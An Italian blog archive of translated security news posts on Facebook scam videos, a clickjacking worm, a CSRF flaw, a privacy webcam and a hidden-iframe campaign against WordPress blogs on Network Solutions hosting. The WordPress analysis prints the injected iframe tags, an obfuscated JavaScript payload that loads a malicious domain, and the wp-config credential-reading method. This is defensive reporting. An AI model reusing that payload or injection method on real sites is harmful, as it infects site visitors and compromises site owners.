L’attacco video “Distracting Beach Babes” colpisce gli utenti Facebook

Il post seguente è stato tradotto, previa autorizzazione, di Graham Cluley’s blog

schermata di login Facebook
Migliaia di utenti Facebook stanno segnalando di esser stati colpiti da un attacco malware che utilizza un video con giovani donne in bikini su una spiaggia.

I messaggi vengono pubblicati sulla bacheca dei membri di Facebook, con un thumbnail del fondoschiena di una giovane donna in bikini.

I messaggi sono i seguenti:

<name>, this is hilarious! lol :P :P :P Distracting Beach Babes [HQ] Length: 5:32

Lo scam di “Distracting Beach Babes” sembra essere l’ultima incarnazione del maggiormente noto “Sexiest Video Ever”, attacco compiuto via Facebook lo scorso fine settimana e che, grazie all’installazione di adware sul computer della vittima, permetteva agli hacker di guadagnare bene.

Non dovreste avere dubbi su quanto sia efficace un metodo del genere. Molti utenti Facebook sono fin troppo abituati a ricevere video lascivi e link divertenti dagli amici e a far clic su di essi senza riflettere. Purtroppo questo potrebbe scatenare un bombardamento di messaggi dannosi verso i propri contatti del social networking. Vorreste davvero che un blitz del genere venisse scatenato a vostro nome?

Fortunatamente, alcuni utenti di Facebook utilizzano questo media per segnalare la minaccia:

Avviso dell'attacco video Distracting beach babes

Se siete stati colpiti, dovreste eliminare il messaggio incriminato dalla vostra pagina, controllare il computer con un antivirus aggiornato, cambiare le password e rivedere le impostazioni delle applicazioni di Facebook.

Inoltre, imparate una lezione importante: non siate così veloci a fare clic su link non richiesti, o ad approvare applicazioni sconosciute per il futuro.

Ma cosa ancora più importante, dite ai vostri amici di fare lo stesso.

Sto cominciando a chiedermi se i cibercriminali lancino deliberatamente queste campagne nei fine settimana, forse credono che i ricercatori nell’ambito degli antivirus e lo stesso team di sicurezza Facebook stiano sonnecchiando?

Se siete utenti regolari di Facebook, perché non iscrivervi alla fan page di Sophos su Facebook ?

Faremo del nostro meglio per garantire che siate costantemente aggiornati con le ultime notizie sulla sicurezza.

Fonte: Distracting Beach Babes video attack hits Facebook users


Posted in Naked Security, Traduzioni inglese-italiano and tagged , by with no comments yet.

Il worm “Try not to laugh xD:” si diffonde tramite i messaggi di stato su Facebook

Il post seguente è stato tradotto, previa autorizzazione, di Graham Cluley’s blog

Oggi, un worm che sfrutta il clickjacking, si è diffuso rapidamente via Facebook, per indurre gli utenti a pubblicarlo tramite gli aggiornamenti di stato.

 Attacco Try not to laugh

Il worm, soprannominato Fbhole a causa del dominio a cui punta, invia un messaggio simile al seguente:

Try not to laugh xD http://www.fbhole.com/omg/allow.php?s=a&r=<random number>

Il clic sul link visualizza un falso messaggio di errore che, grazie ad un exploit clickjacking, costringe l’utente a premere un pulsante invisibile, pubblicando lo stesso messaggio sul proprio stato di Facebook.

Abbiamo visto alcuni casi di clickjacking sfruttati dagli hacker in occasione di altri attacchi contro le reti sociali, ad esempio nell’ attacco “Don’t click” su Twitter , all’inizio del 2009.

La buona notizia è che è effettivamente tale. Contrariamente all’attacco “Don’t click” di Twitter, sembra che quest’ultimo allarme di sicurezza su Facebook sia stato motivato più dal crear guai che dal denaro.

Maggiori informazioni sull’attacco si possono trovare sul blog dei nostri amici di F-Secure .

Mikko Hypponen, di F-Secure, racconta di aver telefonato al numero associato al sito fbhole.com e che quest’ultimo sia stato messo off-line 15 minuti dopo. Ottimo, Mikko.

Dovremmo esser sorpresi da questo ultimo attacco via Facebook? Non penso proprio.

Una delle conclusioni principali del Sophos Threat Report 2010 è lo stupefacente aumento del 70% nelle segnalazioni di attacchi malware tramite le reti sociali. Facebook, in particolare, è stata nominata la rete sociale più rischiosa tra tutti i partecipanti .

(Vi è piaciuto questo video? Potete trovarne altri su SophosLabs YouTube channel e iscrivetevi, se volete )

Se sei un fan di Facebook, potresti volerti iscrivere alla pagina di Sophos e assicurarti di essere sempre aggiornato con le ultime notizie sulla sicurezza.

Fonte: Try not to laugh xD: Worm spreads via Facebook status messages


Posted in Naked Security, Traduzioni inglese-italiano and tagged , by with no comments yet.

Imbarazzante vulnerabilità di Facebook relativa alla privacy

Il post seguente è stato tradotto, previa autorizzazione, da Graham Cluley’s blog

Facebook patch
Un ricercatore ha scoperto una vulnerabilità critica su Facebook che potrebbe essere sfruttata dagli hacker per rivelare informazioni sensibili degli utenti.

MJ Keith, senior security analyst dell’azienda specializzata in sicurezza Alert Logic, ha scoperto la vulnerabilità che potrebbe rivelare informazioni private, o permettere che alcune pagine degli utenti Facebook siano oggetto di defacing.

Il reporter Robert McMillan, di IDG security, ha spiegato molto bene il problema :

Il bug ha a che fare con il modo in cui Facebook effettua la verifica per assicurarsi che i browser che si connettono al sito siano realmente quelli che sostengono di essere. I server di Facebook utilizzano il codice chiamato "post_form_id" token per controllare che il browser che tenta di fare qualcosa - esprimere il gradimento per un gruppo, ad esempio - sia realmente il browser che ha effettuato l'accesso all'account. I server di Facebook controllano questo token prima di apportare modifiche alla pagina dell'utente ma Keith ha scoperto che semplicemente eliminando il token dai messaggi, avrebbe potuto cambiare molte impostazioni su qualsiasi account Facebook.

Questo si chiama CSRF (Cross-site request forgery attack), se lasciato senza patch, permetterebbe agli hacker di creare pagine web dannose che potrebbero inviare istruzioni all'account della vittima senza essere autenticati.

La conseguenza? Beh, un hacker potrebbe rendere pubbliche quelle che, finora, erano informazioni private, o forzare il tuo profilo a farsi "piacere" un gruppo che potrebbe risultare imbarazzante.

MJ Keith riferisce sul sito di Alert Logic di aver informato Facebook del problema l'11 maggio e che il problema è stato risolto.

Tuttavia IDG ha riferito che la vulnerabilità è ancora presente.

Speriamo che, se non ancora corretta, questa vulnerabilità relativa alla privacy - che giunge in un momento imbarazzante per Facebook - venga rimossa al più presto.

Se sei un utente abituale di Facebook, potresti fare ancora di più e iscriverti alla pagina di Sophos sul sito per essere sempre aggiornato con le ultime notizie sulla sicurezza.

Ah, e ricordati di stare attento a fare clic su link sospetti ...

Fonte: Embarrassing privacy flaw found on Facebook


Posted in Naked Security, Traduzioni inglese-italiano and tagged , by with no comments yet.

The sexiest video ever? Gli utenti Facebook colpiti dall’attacco Candid Camera Prank

Il post seguente è stato tradotto, previa autorizzazione, da Graham Cluley’s blog

Leanne, membro della fan page di Sophos su Facebook, mi ha contattato oggi per chiedermi in merito ad alcuni video pubblicati automaticamente sui profili degli utenti, dal titolo “The sexiest video ever” ( Il video più sexy di sempre ).

Una piccola ricerca ha rivelato che migliaia di utenti si son svegliati con alcuni messaggi sul loro wall, apparentemente inviati dai loro amici di Facebook.

Fake Candid camera prank video on Facebook

Il messaggio è il seguente:

<nome> this is without doubt the sexiest video ever! :P :P :P

C’è anche un video dal titolo "Candid Camera Prank [HQ]" . Il messaggio sembra essere un thumbnail del video di una donna in bicicletta con una gonna corta. La durata del video pare sia di 03:17.

Probabilmente sarete soliti condividere e ricevere video come questo con i vostri compagni online. Posso certamente immaginare che parecchi sarebbero tentati di riprodurre il video. Ognuno è padrone di farlo. In questa occasione, però, si dovrebbe essere estremamente prudenti; visto che se si fa clic sul thumbnail non si riproduce il video, ma si viene rediretti a un’applicazione di Facebook.

Ho tentato personalmente ma l’applicazione non è stata eseguita (forse Facebook ha già provveduto diversamente?). Secondo quanto riferito dagli utenti, l’applicazione avverte che il player video non è aggiornato e si viene invitati a scaricare un file.

Gli utenti riferiscono anche che lo stesso video è stato inviato (utilizzando l’avatar e il nome, come se lo avessero inviato personalmente) ad amici e conoscenti di Facebook, in modo da poterlo diffondere ancora più velocemente.

A giudicare dal numero di messaggi postati su Facebook, migliaia di persone sono state vittime di questo attacco.
Se foste uno di loro, sarebbe necessario controllare il computer con un antivirus aggiornato, cambiare le password, rivedere le impostazioni delle applicazioni Facebook e imparare a non abboccare a un semplice trucco di social engineering come questo, in futuro.

Aggiornamento Patrik Runald, uno dei nostri amici di Websense Security Labs, ha pubblicato questo video che mostra l’attacco.

Patrik è riuscito a catturare l’attacco mentre stava avvenendo, inoltre ha scoperto che, a parte propagarsi, è stato progettato per installare l’adware Hotbar per aumentare i profitti dei cattivi.

Se usate regolarmente Facebook, perché non iscrivervi alla pagina di Sophos su Facebook?.

Faremo del nostro meglio per garantire che siate sempre aggiornati sulle ultime notizie relative alla sicurezza.

Fonte: The sexiest video ever? Facebook users hit by Candid Camera Prank attack


Posted in Naked Security, Traduzioni inglese-italiano and tagged , by with no comments yet.

Network Solutions e la vulnerabilità di WordPress

Il post seguente è stato tradotto, previa autorizzazione, dal blog Unmask Parasites

Ho notato questo iframe nascosto hxxp://networkads .net/ grep/ il 7 aprile.

Subito hanno attirato la mia attenzione questi strani script “iframe_style” nei report di Unmask Parasites (ho anche pensato fosse un bug in Unmask Parasites, ma controllando il sito infetto ho trovato gli stessi script).

weird scripts

Tuttavia è stato un incidente isolato e non ho notato alcun pattern evidente. Due giorni dopo, quando ho notato l’ articolo di David (Sucuri Security) su questo argomento e il follow-up di Brian Krebs, ho deciso di dare un’occhiata più da vicino.

Quello che ho trovato è molto interessante e solleva alcune domande serie in merito alla sicurezza dei siti web sui server condivisi.

Un breve riassunto degli articoli di David e Brian

1.Numerosi blog con WordPress sono stati recentementi violati. Qualcuno ha iniettato l’iframe che inserisce il seguente contenuto dannoso dai server di networkads .net

<iframe style="display:none" height="0" width="1" src="hxxp://networkads .net/ grep/"></iframe>

2. L’injection è stata fatta tramite database di WordPress. Gli hacker hanno sostituito il valore dell’opzione siteurl del database wp_options (il prefisso della tabella può essere diverso nel vostro caso) con il codice iframe:

<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"hxxp://networkads .net/ grep/\"></iframe>'

3. Questa modifica silente dei parametri siteurl, ha violato la maggior parte dei blog (sia visivamente che funzionalmente); in quanto ci sono molte dipendenze dal parametro siteurl in WordPress. Così i webmaster dovranno ripristinare manualmente il valore di questo parametro per l’URL del sito nei loro database MySql (che dovrebbe essere qualcosa del tipo: http://yoursite.com/blogroot).

4. Tutti i siti interessati sono ospitati da Network Solutions.

Le mie scoperte

Ricerche Google

La violazione spezza il codice html. Questa è una linea tipica del linguaggio html, interrotta da questa iframe injection:

<link rel="pingback" href=""><iframe style="display: none" height="0" width="1" src="hxxp://networkads .net/ grep/"></iframe>/xmlrpc.php" />

Poiché la maggior parte dei temi WordPress utilizza attivamente il parametro siteurl nella sezione dell’ html, questo codice spezzato li fa assomigliare a questo:

broken blogs

ciò permette di creare una query di ricerca di Google che restituirà i blog similmente violati. Per esempio: wp-content text/css media screen xmlrpc.php -pingback questa ricerca produce circa 5.000 risultati .

Molti puntano ai blog violati. Questi 5.000, naturalmente, includono pagine indicizzate più volte dagli stessi siti; ma ho potuto trovare facilmente più di 60 blog infetti nelle prime 10 pagine dei risultati della ricerca. ( Attenzione: molti blog sono ancora infetti al momento in cui scrivo.)

Soltanto Network Solutions

Tutti questi blog sono ospitati da Network Solutions. Non un solo sito infetto è al di fuori della loro rete. Ciò significa che questo particolare attacco è limitato ai server di Network Solutions.

Ip dei server

La maggior parte dei blog infetti ( 40 e più ) si trovano sul server con indirizzo IP: 205.178.145.65

Ho trovato anche blog infetti con le stesse modalità in più di 16 Ip di Network Solutions :

205.178.145.85
205.178.145.86
205.178.145.99
205.178.145.105
205.178.145.116
205.178.189.131
206.188.192.204
206.188.193.32
206.188.193.63
206.188.193.63
206.188.193.64
206.188.193.179
206.188.193.195
206.188.193.220
206.188.193.250
206.188.196.127
206.188.211.27

La violazione non riguarda solo il database

Questo attacco non solo inietta il codice iframe nel database WordPress, in alcuni siti gli hacker iniettano il codice iframe (leggermente modificato) direttamente nei file sui dischi.

<iframe frameborder="0" onload=' if (!this.src){ this.src="http://networkads.net/grep/"; this.height=0; this.width=0;} '></iframe>

I luoghi dell’injection suggeriscono che il codice non sia stato preso dal database.

Domini diversi

networkads .net non è stato l’unico nome di dominio usato da questo attacco. Prima gli hacker utilizzavano binglbalts .com e ora usano mainnetsoll .com/ .

Tre domini che puntano allo stesso server con indirizzo 64.50.165.169 (Lunar Pages), che sembra essere un server dedicato violato (o server virtuale dedicato), con diversi siti legittimi.

Secondo whois:

  • binglbalts .com creato il 1 aprile 2010
  • networkads .net creato il 4 aprile 2010
  • mainnetsoll .com creato il 10 aprile 2010

Contrariamente a questo breve storico, secondo il database di Google Safe Browsing, binglbalts. com e networkads.net hanno già modificato numerosi server su 3 network differenti.

Aggiornamento: script offuscato

Quando ho pubblicato questo articolo, ho verificato i siti compromessi ancora una volta e ho scoperto questo script offuscato su uno di loro:

e v a l(function(p, a, c, k, e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('h f(a,8,d){6 3=i m();3.l(3.k()+(d*n));6 5="; 5="+3.j();4.9=a+"="+8+5+"; "}6 c=4.9;b(c.v("g")==-1){4.o(\'<e w="0" y=\\\' b (!2.7){ 2.7="t://u.p/q/"; 2.r=0; 2.s=0;} \\\'></e>\');f("g","1",x)}',35,35,'||this|date|document|expires|var|src|value|cookie|name|if||hours|iframe|addCookie|seref|function|new|toGMTString|getTime|setTime|Date|3600000|write|com|grep|height|width|http|mainnetsoll|indexOf|frameborder|24|onload'.split('|'),0,{})) ;

Era subito dopo il tag <body>.

Questo script verifica la presenza di un cookie chiamato seref. Se tale cookie non è presente, inietta un iframe nascosto proveniente da hxxp://mainnetsoll.com/ e imposta questo cookie seref per un giorno.

Come si può vedere l’attacco evolve costantemente e questa volta il codice dannoso viene iniettato direttamente in un file di WordPress.

Altre violazioni

Sembra che questi ultimi iframe injection non sia la prima volta che vengano usati per attaccare i blog WordPress sui server di Network Solutions. I segni di altri attacchi sono ancora visibili.

Hidden links

Alcuni dei blog violati contengono centinaia di link spam, visibili solamente se si naviga disattivando JavaScript. Per qualche motivo, ogni link è racchiuso tra tag <noindex> e usa rel=”nofollow”nei parametri dei tag. Quindi qual è il suo uso, se non vien utilizzato da chi naviga sul web, né dai motori di ricerca?

I link sono seguiti da iframe nascosti di networkads.

alkoltashov.narod.ru

Ho trovato inoltre una dozzina di blog WordPress infetti che traggono gli hidden link da hxxp://alkoltashov.narod.ru/ sites.txt. I link dovrebbero mostrare <div> esternamente rispetto all’area visibile, ma a causa della configurazione dei server di Network Solutions, che non permette l’accesso ai file tramite url, questa injection fallisce restituendo l’errore seguente (anch’esso mostrato oltre l’area visibile ):

<div style="left: -2322px; position: absolute; top: -3433px">
Warning: readfile() : URL file-access is disabled in the server configuration in /data/path/to/the/user's/account/wordpress/wp-content/themes/themename/header.php on line 163
Warning: readfile(hxxp://alkoltashov .narod .ru/ sites.txt) : failed to open stream: no suitable wrapper could be found in /data/path/to/the/user's/account/wordpress/wp-content/themes/themename/header.php on line 163
</div>

Secondo la cache di Google, questa injection di link in remoto è avvenuta a gennaio.

Ed è limitata ai blog sui server di Network Solutions.

WebEasySearch. com

Alcuni dei blog violati, inoltre, reindirizzano i risultati dei motori di ricerca verso il sito webeasysearch .com.

Questo avviene solamente se non avete già visitato il blog violato (probabilmente vengono verificati i cookie di WP).

Questa violazione cifra la stringa della query del motore di ricerca e la passa a webeasysearch ( webeasysearch .com ), che la decifra e visualizza i propri risultati per la stessa query.

Scommetto che sia effettuato da qualche codice PHP iniettato nel file di WordPress.

Lo stile della violazione e la gamma dei siti colpiti, mi fanno pensare che tutte queste violazioni siano state realizzate dallo stesso hacker.

Conclusione

1. Gli hacker, decisamente, hanno come obiettivo i blog WordPress, ma dubito che sia stata sfruttata una qualsiasi vulnerabilità di WordPress. Altrimenti avremmo assistito ad altre violazioni simili non solo sui server di Network Solutions.

2. Allo stesso tempo però, sono interessati più di una dozzina di server di Network Solutions. Potrebbe esserci una falla di sicurezza (o una minima vulnerabilità ) sulla loro rete. Dovrebbero esaminare seriamente il problema.

3. Sono d’accordo con David di Sucuri Security, che pensa che tutto ciò possa essere eseguito tramite l’accesso ad un unico account compromesso (o anche creato legalmente da alcuni hacker). Gli hacker possono utilizzare questo account per eseguire script che leggono il contenuto dei file di wp-config.php su account neighbor (secondo una ricerca con reverse IP ci sono diverse migliaia di siti sul server con IP 205.178.145.65).

È abbastanza facile ( non svelerò i trucchi del perfetto hacker ma funzionano bene sui server di Network Solutions ) identificare i siti con blog WordPress su qualsiasi server e di conseguenza identificare i percorsi assoluti del file wp-config.php, che contengono i dati d’accesso al database e i nomi delle tabelle di WordPress, il tutto in chiaro. Gli hacker, successivamente, hanno semplicemente bisogno di eseguire un altro script che inietti quello che vogliono nei database dei loro neighbour server.

Allo stesso modo qualsiasi codice dannoso può essere iniettato in tutti i file scrivibili nell’account neighbor.

Vulnerabilità progettuale di WordPress

Sui server condivisi è possibile proteggere i propri file da neighbor dannosi, rendendoli di sola lettura. Solitamente i permessi sui file a 644 e sulle directory a 755 sono sufficienti.

Tuttavia se i neighbor, in qualche modo, riescono ad ottenere l’accesso, possono fare ciò che vogliono con il vostro database. Nel caso di WordPress, è sufficiente leggere il file wp-config.php nella root del blog WordPress.

Per nascondere il contenuto del file wp-config.php dai server neighbor, David (Sucury Security) consiglia che questo file debba avere 750 ( credo volesse dire 640 , in quanto il permesso di esecuzione non è necessario ). Purtroppo, questo funziona solo sui server con suPHP. Su altri server dove il server web esegue gli script PHP con propri diritti, questo stratagemma rischia di danneggiare completamente i blog WordPress. Ogni pagina restituirà l’errore Failed opening required ‘wp-config.php’” .

Questo significa che i blog di WordPress sono vulnerabili a questo tipo di attacco sulla maggior parte dei server condivisi . Basta violare un account (la maggior parte dei server condivisi hanno più account violati), o addirittura creare un account appositamente per l’hacking e sarà possibile guadagnare l’accesso al database MySQL dei vostri neighbor che abbiano un blog con WordPress. Qualsiasi altro web script che dipenda da un database e che memorizzi i dati d’accesso in chiaro, è anch’esso vulnerabile.

I ragazzi di WordPress sono consapevoli di questo problema sui server condivisi ma, per qualche motivo, danno anche questo strano consiglio sui permessi a 750 per wp-config.php, che è sbagliato (750 invece di 640) e funziona soltanto sui server suPHP :

Se siete su un server condiviso i permessi della directory wp-config.php dovrebbero essere a 750. Questo significa che nessun altro utente sarà in grado di leggere il nome utente e la password del vostro database. Se si dispone di FTP o accesso alla shell, procedere come segue:

chmod 750 wp-config.php

Quindi non c’è un modo universale per proteggere i dati d’accesso al database sui server condivisi. Vedo sempre più attacchi caratterizzati da un account compromesso su un server condiviso e successivamente utilizzato per violare altri siti sullo stesso server. È il momento di rivedere l’approccio utilizzato verso il file wp-config.php .

Dite la vostra

Cosa pensate del problema dei file wp-config.php universalmente leggibili sui server condivisi? Qualche idea su come risolverlo?

Se siete un cliente di Network Solutions ed il vostro sito è stato violato, mi piacerebbe sapere anche le vostre esperienze.
Potreste raccontarci quali permessi sui file utilizzate (soprattutto se siete stati vittime degli attacchi di alkoltashov .narod .ru and WebEasySearch ) ?

Altri commenti sono i benvenuti.

Post correlati:

Fonte: Network Solutions and WordPress Security Flaw


Posted in Traduzioni inglese-italiano, Unmask Parasites and tagged , , , by with no comments yet.

La webcam anti-sbirciata protegge la vostra privacy

Il post seguente è stato tradotto, previa autorizzazione, da Graham Cluley’s blog

Peeping webcam

Ho già parlato del problema dei pervertiti e dei cyberstalker che usano il malware per controllare le webcam delle proprie vittime e spiare segretamente le persone nelle proprie camere da letto.

In più occasioni gli hacker hanno sfruttato la tecnologia per ricattare giovani donne che posavano nude, minacciando d’inviare altre foto compromettenti ai loro amici online.

La maggior parte del software dannoso è progettato per rubare l’identità dell’utente, le password, i dati bancari; ma è altrettanto facile programmare un cavallo di Troia/spyware che prenda il controllo della webcam.

Ecco perché ero interessato a vedere questa nuova webcam usb di Gsou.

La maggior parte delle webcam visualizza una luce quando è accesa. Questa invece, dalle sembianze di un simpatico robot umanoide, alza le braccia per coprire il suo “occhio” quando è spenta! Sarebbe piuttosto difficile non accorgersi che un hacker, da remoto, ha attivato la webcam se le sue braccia improvvisamente si sono abbassate.

Secondo i costruttori cinesi, i movimenti automatici verso il basso o l’alto per segnalare l’attivazione o disattivazione della webcam, possono anche essere eseguiti manualmente.

Tutto questo non solo è molto carino ma posso immaginare che possa anche offrire un livello supplementare di privacy nella vita privata delle persone su Internet.

Naturalmente assicurarsi che la webcam non possa spiare, è solo un modo per difendersi. Si dovrebbe anche mantenere il computer protetto dalle minacce più recenti con software anti-malware, patch di sicurezza e firewall. E se non ci si può permettere un simpatico robot che automaticamente copre il suo obiettivo quando si desidera privacy, magari un cerotto sulla webcam potrebbe svolgere lo stesso lavoro altrettanto bene?

Hmm .. considerando le news recenti , dove il malware potrebbe essere integrato all’interno della tecnologia cinese, mi chiedo se l’India acquisterà una di queste webcam? ;-)

Chapeau a Wing Fei Chia per averlo segnalato per primo

Fonte: Anti-peeping webcam protects your privacy


Posted in Naked Security, Traduzioni inglese-italiano and tagged , by with no comments yet.

Optical Illusion! [HQ] – Link ad un video di Facebook che potrebbe contenere un virus

Il post seguente è stato tradotto dal blog: Technott

Sulla bacheca di un vostro amico su Facebook, potreste aver notato un video dal titolo “ Optical Illusion! [HQ] “ .
In realtà non è un video ma un link a un’applicazione. Se proseguite, vi verrà chiesto di scaricare un file chiamato flvdirect.exe che potrebbe contenere virus o malware.

Aggiornamento: Questo scam è stata rimosso da Facebook. L’applicazione non esiste più. In futuro se troverete altre applicazioni simili, non diventate vittime inconsapevoli. Se avete trovato qualche altro scam, potete segnalarlo.

Ecco l’aspetto del post:

Facebook video virus

Ecco come funziona questo virus:

1) Dopo aver fatto clic sul link vi verrà chiesto di autorizzare l’applicazione FB HD Video Player – hxxx://apps.facebook.com/hghh_rtrt/ -

2) Verrà quindi visualizzato il messaggio Grazie per l’autorizzazione! Potete continuare con il video ora.

3) Dopo aver fatto clic su continua, verrete rediretti alla pagina in cui dovrebbe esserci il video. Il video non si aprirà e verrà visualizzato il messaggio “Il tuo lettore FLV sembra non essere aggiornato. Aggiorna il tuo lettore FLV per continuare. Fate clic sul pulsante “Continua” e attendete qualche secondo.

4) Poi vi verrà chiesto di scaricare il file “ FLVDirect.exe “.

Immediatamente verrà inviato un messaggio sulla bacheca dei vostri amici che mostrerà il link e il messaggio “[vostro nome], questo è senza dubbio il video più bollente che ci sia! :P :P :P

Non cliccate sul link e se doveste trovarlo sulla bacheca di un vostro amico, ignoratelo. Se avete già cliccato rimuovete l’applicazione andando su:

Account – Impostazioni applicazioni

Troverete “ F.B. HD Video Player ” fate clic sulla croce sulla destra per eliminarlo.

Se avete scaricato e installato il programma “Flvdirect.exe” analizzate il computer con un antivirus e un malware scanner.

Facebook certamente rimuoverà l’applicazione in pochi giorni. Tuttavia i vostri amici potrebbero abboccare. Avvisateli.

Fonte: Optical Illusion! [HQ] ” – Facebook video link which may contain virus


Posted in Traduzioni inglese-italiano and tagged , , by with no comments yet.